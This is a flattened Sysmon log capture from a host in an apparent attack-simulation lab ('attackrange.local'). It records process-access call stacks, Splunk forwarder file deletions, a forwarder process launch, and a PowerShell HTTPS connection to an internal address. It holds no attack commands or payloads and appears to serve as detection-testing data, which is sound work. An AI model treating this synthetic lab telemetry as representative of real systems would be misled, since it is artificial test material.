14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342473Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342472Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342471Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342470Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342469Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342468Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342466Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342465Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342464Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342463Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342462Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342461Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342460Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342459Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:59:59.206{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035342489Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:00.567{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C413D8CE326D842A9682ABC54071BCD7,SHA256=46DA274294FFFF9ECA1242384F104637BE42B0246EC4485C3A1A519C85C5480A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342488Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:00.105{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6578EDAB91D0F17C49CB5B43868CD773,SHA256=2CD44D6C40D72855666E722C1122DCFA788A43E29F9DE2FB73BA44B2B0FDC17B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342492Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:26.338{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52433-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035342491Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:26.184{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52432-false10.0.1.12-8000- 23542300x800000000000000035342490Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:01.150{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=905B7E1D2F2BA1690865A0FED9986365,SHA256=97363694FE2CC61F0BC94B9479692A0404C3C4368AC026EFF90D6774FE6B424F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342493Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:02.168{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F34777C9683CC218A137123501AF634,SHA256=D93A7178D9F0683654A3F0826DF5F3B751558F612FD3FD7AD94299D01CCAA359,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342494Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:03.173{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DD806C0EEC0BF9F59F8B9466FE8BBD7,SHA256=CFDC658F889D93642BD29E568610C2D216958D4D469B94BA50B5891B50A35D06,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342512Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.646{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-72F4-613B-38B4-03000000C801}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342511Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.646{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342510Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.646{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342509Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.646{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342508Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.646{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342507Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.646{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-72F4-613B-38B4-03000000C801}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342506Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.646{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-72F4-613B-38B4-03000000C801}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342505Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.632{B81B27B7-72F4-613B-38B4-03000000C801}6488C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035342504Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.315{B81B27B7-72F4-613B-37B4-03000000C801}61603532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035342503Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.262{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64C430BCCD5CF268D41F56D1CD1481ED,SHA256=6BE2B0FF0EE34EEFAB327E6BB133BE3FCBB7FD8CB943B5DAA5D7E61487602744,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342502Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:04.131{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-72F4-613B-37B4-03000000C801}6160C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342501Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 